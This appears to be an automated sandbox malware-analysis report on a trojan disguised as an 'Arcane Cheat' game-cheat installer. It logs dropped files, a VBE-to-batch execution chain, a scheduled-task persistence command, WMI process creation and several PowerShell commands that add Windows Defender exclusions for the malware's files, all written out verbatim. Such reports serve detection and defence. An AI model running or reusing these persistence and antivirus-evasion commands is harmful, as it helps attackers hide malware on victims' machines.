            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://sv.symcd.com0&
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: powershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Arcane CheatSetup.exe, 00000001.00000003.1704112001.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.tmp, 00000002.00000003.1721377728.00000000031A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
            Source: Arcane CheatSetup.exe, 00000001.00000003.1705276766.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.exe, 00000001.00000003.1709172010.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.tmp, 00000002.00000000.1713179499.0000000000401000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.innosetup.com/
            Source: uChcvn3L6R.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
            Source: is-KHA4M.tmp.2.drString found in binary or memory: http://www.oracle.com/hotspot/jvm/
            Source: is-KHA4M.tmp.2.drString found in binary or memory: http://www.oracle.com/hotspot/jvm/java/monitor/address
            Source: is-KHA4M.tmp.2.drString found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id
            Source: is-KHA4M.tmp.2.drString found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/compiler/id
            Source: is-KHA4M.tmp.2.drString found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/gc/id
            Source: is-NCUG3.tmp.2.drString found in binary or memory: http://www.oracle.com/technetwork/java/javase/overview/
            Source: is-KHA4M.tmp.2.drString found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/
            Source: is-KHA4M.tmp.2.drString found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/C:
            Source: Arcane CheatSetup.exe, 00000001.00000003.1705276766.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.exe, 00000001.00000003.1709172010.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.tmp, 00000002.00000000.1713179499.0000000000401000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.remobjects.com/ps
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://www.symauth.com/cps0(
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: http://www.symauth.com/rpa00
            Source: powershell.exe, 00000029.00000002.2077921372.0000022C973C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1964510418.000001C080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1952888234.0000020400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2053761030.000001D25E141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2021882482.0000019F58C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: powershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,3_2_0082718C
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\addins\audiodg.exeJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\addins\42af1c969fbb7bJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exeJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\Fonts\4f78d385fc35a0Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\en-US\qiOZcVoixJLcuAFKAnRd.exeJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\en-US\4f78d385fc35a0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082857B3_2_0082857B
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_008370BF3_2_008370BF
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0084D00E3_2_0084D00E
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082407E3_2_0082407E
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_008511943_2_00851194
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_008232813_2_00823281
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082E2A03_2_0082E2A0
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_008402F63_2_008402F6
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_008366463_2_00836646
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_008337C13_2_008337C1
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_008227E83_2_008227E8
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0084070E3_2_0084070E
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0084473A3_2_0084473A
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082E8A03_2_0082E8A0
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082F9683_2_0082F968
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_008449693_2_00844969
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00833A3C3_2_00833A3C
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00836A7B3_2_00836A7B
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00840B433_2_00840B43
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0084CB603_2_0084CB60
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00835C773_2_00835C77
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083FDFA3_2_0083FDFA
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082ED143_2_0082ED14
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00833D6D3_2_00833D6D
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082BE133_2_0082BE13
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082DE6C3_2_0082DE6C
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00825F3C3_2_00825F3C
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00840F783_2_00840F78
            Source: C:\Windows\addins\audiodg.exeCode function: 38_2_00007FFD9BAAA71D38_2_00007FFD9BAAA71D
            Source: C:\Windows\addins\audiodg.exeCode function: 38_2_00007FFD9BAAD66838_2_00007FFD9BAAD668
            Source: C:\Windows\addins\audiodg.exeCode function: 38_2_00007FFD9BAAACF038_2_00007FFD9BAAACF0
            Source: C:\Windows\addins\audiodg.exeCode function: 38_2_00007FFD9BAAC64838_2_00007FFD9BAAC648
            Source: C:\Windows\addins\audiodg.exeCode function: 38_2_00007FFD9BAAC24038_2_00007FFD9BAAC240
            Source: C:\Windows\addins\audiodg.exeCode function: 38_2_00007FFD9BAAA1C538_2_00007FFD9BAAA1C5
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAACC2844_2_00007FFD9BAACC28
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAAA71D44_2_00007FFD9BAAA71D
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAAD66844_2_00007FFD9BAAD668
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAA2CA044_2_00007FFD9BAA2CA0
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAAAB3044_2_00007FFD9BAAAB30
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAAA71D44_2_00007FFD9BAAA71D
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAAC24044_2_00007FFD9BAAC240
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAA2CA044_2_00007FFD9BAA2CA0
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAAC64844_2_00007FFD9BAAC648
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAAACF044_2_00007FFD9BAAACF0
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAA9D4D44_2_00007FFD9BAA9D4D
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: String function: 0083E28C appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: String function: 0083E360 appears 52 times
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: String function: 0083ED00 appears 31 times
            Source: uChcvn3L6R.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: uChcvn3L6R.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: Arcane CheatSetup.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: Arcane CheatSetup.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: uChcvn3L6R.exe, 00000000.00000003.1725594185.0000000004FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs uChcvn3L6R.exe
            Source: uChcvn3L6R.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, OPGpF4YRttobaOjLnpx.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, OPGpF4YRttobaOjLnpx.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, TqIR1IaX6SfDv216AUp.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, TqIR1IaX6SfDv216AUp.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, OPGpF4YRttobaOjLnpx.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, OPGpF4YRttobaOjLnpx.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, TqIR1IaX6SfDv216AUp.csCryptographic APIs: 'TransformBlock'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, TqIR1IaX6SfDv216AUp.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, b5hTDFeLD6bE2HAfhlF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, b5hTDFeLD6bE2HAfhlF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, b5hTDFeLD6bE2HAfhlF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, b5hTDFeLD6bE2HAfhlF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal92.troj.expl.evad.winEXE@41/475@1/1
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00826EC9 GetLastError,FormatMessageW,3_2_00826EC9
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_00839E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00839E1C
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane CheatJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeMutant created: \Sessions\1\BaseNamedObjects\Local\2f1bb18a36a2997857c610994e6b82f6ce779022
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeFile created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "
            Source: unknownProcess created: C:\Recovery\explorer.exe
            Source: unknownProcess created: C:\Recovery\explorer.exe
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCommand line argument: sfxname3_2_0083D5D4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCommand line argument: sfxstime3_2_0083D5D4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCommand line argument: STARTDLG3_2_0083D5D4
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: uChcvn3L6R.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.91%
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
            Source: uChcvn3L6R.exeReversingLabs: Detection: 91%
            Source: uChcvn3L6R.exeVirustotal: Detection: 79%
            Source: uChcvn3L6R.exeString found in binary or memory: /LOADINF="filename"
            Source: unknownProcess created: C:\Users\user\Desktop\uChcvn3L6R.exe "C:\Users\user\Desktop\uChcvn3L6R.exe"
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeProcess created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe "C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp "C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp" /SL5="$4042E,46527891,119296,C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeProcess created: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe"
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f
            Source: unknownProcess created: C:\Windows\addins\audiodg.exe C:\Windows\addins\audiodg.exe
            Source: unknownProcess created: C:\Windows\addins\audiodg.exe C:\Windows\addins\audiodg.exe
            Source: unknownProcess created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeProcess created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe "C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe" Jump to behavior
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeProcess created: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp "C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp" /SL5="$4042E,46527891,119296,C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /fJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'Jump to behavior
